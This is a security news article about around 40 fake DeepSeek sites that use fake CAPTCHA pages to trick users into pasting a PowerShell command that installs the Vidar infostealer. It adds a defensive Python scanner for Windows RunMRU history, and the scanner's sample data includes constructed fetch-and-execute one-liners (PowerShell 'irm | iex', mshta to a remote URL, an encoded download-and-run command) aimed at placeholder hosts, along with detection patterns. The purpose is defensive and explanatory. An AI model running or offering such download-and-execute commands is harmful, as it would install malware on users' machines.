Beware of DeepSeek! Cryptocurrency Scammers May Be Using This Name

According to Cybernews, nearly 40 websites impersonating the Chinese AI platform DeepSeek have been created to spread the Vidar malware and target cryptocurrency wallets.

Security firm Zscaler has revealed that cybercriminals are tricking victims into visiting websites that pose as DeepSeek. After registering, users are redirected to a fake CAPTCHA page that is used to get the Vidar malware onto their machine. This information-stealing trojan harvests sensitive files and the data stored by more than a dozen browsers, including Google Chrome, Mozilla Firefox, Microsoft Edge, and Opera GX. The attackers also target cryptocurrency wallet extensions such as Coinbase and MetaMask.

Cybercriminals Are Impersonating DeepSeek

These malicious sites not only distribute malware but are also used to carry out “pump-and-dump” schemes in the cryptocurrency market, gift card fraud, and fake gambling services.

With DeepSeek gaining popularity, cybercriminals are taking advantage of the hype to seize users’ digital wallets. Numerous fake domains impersonating this Chinese AI platform have been discovered, posing a serious threat to unsuspecting users. These fraudulent DeepSeek websites are designed to steal login credentials, capture cookies, and exfiltrate user files and information.

According to Zscaler, around 40 such domains have been identified, helping spread the Vidar malware. This malware attacks up to 80 cryptocurrency-related extensions, including MetaMask, Coinbase, Binance, and Trust Wallet, while also exploiting data stored in web browsers.

How Do Cybercriminals Steal Login Data?

The attack starts by luring victims to a fake website impersonating DeepSeek. After signing up, users are redirected to a CAPTCHA verification page. Normally a CAPTCHA is a security measure that distinguishes humans from bots; here the attackers use it as a pretext to get the victim to run malicious code on their own device.

Once a user clicks the "I am not a robot" checkbox, JavaScript on the page silently copies a PowerShell command to the clipboard. Fake "verification steps" then instruct the user to open the Windows "Run" dialog (Win+R), paste, and press Enter, so the victim executes the command by hand. If executed, the command downloads and launches the Vidar malware, which begins locating and stealing sensitive files and personal data. No legitimate CAPTCHA ever asks you to paste a command into Run or a terminal; that instruction alone is the tell.
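For defenders, the useful artifact of this paste-and-run ("ClickFix") technique is that the command the victim typed is recorded in the Windows Run dialog history, the RunMRU registry key. The following is an added example written for this article, not code from the page, from Zscaler, or from the malware itself: it parses a RunMRU-style dump and flags one-liners with the traits described above (hidden window, download cradle, inline evaluation, encoded command, LOLBin launch). The registry values are constructed for the example and the URLs are placeholders; none of them is the real lure's command.

```python
import base64
import re

# Constructed RunMRU dump in the shape of
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU:
# lettered values hold "<command>\1", and MRUList lists slots most-recent-first.
# Every command below is made up for this example; none is the real lure's payload.
_ENC_PAYLOAD = base64.b64encode(
    "iwr http://example.invalid/p -OutFile $env:TEMP\\p.exe; & $env:TEMP\\p.exe"
    .encode("utf-16-le")).decode()

SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "irm http://example.invalid/v | iex"\\1',
    "c": "mshta http://example.invalid/verify.hta\\1",
    "d": f"powershell -nop -ep bypass -enc {_ENC_PAYLOAD}\\1",
}

# "-e/-ec/-enc/-encodedcommand <base64>": PowerShell accepts any unambiguous prefix.
ENCODED_RX = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.I)

# Traits typical of paste-and-run one-liners. Each is weak alone; the verdict
# below needs at least two, one of which must be a fetch or launch vector.
INDICATORS = [
    ("hidden_window",   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("policy_bypass",   re.compile(r"-(?:ep|ex|executionpolicy)\s+bypass", re.I)),
    ("download_cradle", re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|net\.webclient|curl|wget|certutil)\b", re.I)),
    ("inline_eval",     re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("remote_url",      re.compile(r"https?://", re.I)),
    ("lolbin",          re.compile(
        r"(?:^|[\s;&|])(?:mshta|rundll32|regsvr32|wscript|cscript|msiexec|bitsadmin)"
        r"(?:\.exe)?\b", re.I)),
]
DELIVERY = {"download_cradle", "remote_url", "lolbin"}


def decode_encoded_command(command):
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None if absent/undecodable."""
    m = ENCODED_RX.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(command):
    """Run the indicators over the command (plus its decoded payload, if any)."""
    hits = []
    text = command
    decoded = decode_encoded_command(command)
    if decoded is not None:
        hits.append("encoded_command")
        # Swap the base64 blob out so its letters cannot accidentally match other patterns.
        text = ENCODED_RX.sub(" ", command) + "\n" + decoded
    hits += [name for name, rx in INDICATORS if rx.search(text)]
    suspicious = len(hits) >= 2 and bool(DELIVERY & set(hits))
    return {"command": command, "decoded": decoded, "hits": hits, "suspicious": suspicious}


def parse_runmru(values):
    """Yield (slot, command) most-recent-first, stripping the trailing '\\1' marker."""
    out = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue
        out.append((slot, raw[:-2] if raw.endswith("\\1") else raw))
    return out


def scan_runmru(values):
    return [dict(slot=slot, **classify(cmd)) for slot, cmd in parse_runmru(values)]


if __name__ == "__main__":
    for r in scan_runmru(SAMPLE_RUNMRU):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"[{flag:10}] {r['slot']}: {r['command'][:70]}  hits={r['hits']}")
        if r["decoded"]:
            print(f"             decoded: {r['decoded']}")
```

On a live Windows host the same dictionary can be read from the RunMRU key with the standard-library winreg module, or from an exported .reg file during triage. The two-trait rule with a mandatory delivery vector is deliberate: an administrator's own `powershell -ep bypass -w hidden` is noisy but not a download, while `mshta` pointed at a remote URL is enough on its own pair of traits to warrant a look.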

Vidar also hides its command-and-control (C2) infrastructure behind legitimate platforms such as Telegram and Steam, retrieving the current C2 address from profiles hosted there, so the initial lookup blends in with ordinary traffic and the servers can be rotated without changing the sample. This makes the malware harder to detect and to cut off.

By exploiting DeepSeek's reputation, attackers succeed in infecting users' devices and taking control of their digital assets. To stay safe, users should be cautious when visiting AI-related websites, always verify the URL before registering or providing personal information, and treat any page that asks them to paste and run a command, whatever the pretext, as malicious.

Thank you for reading our article to the end.
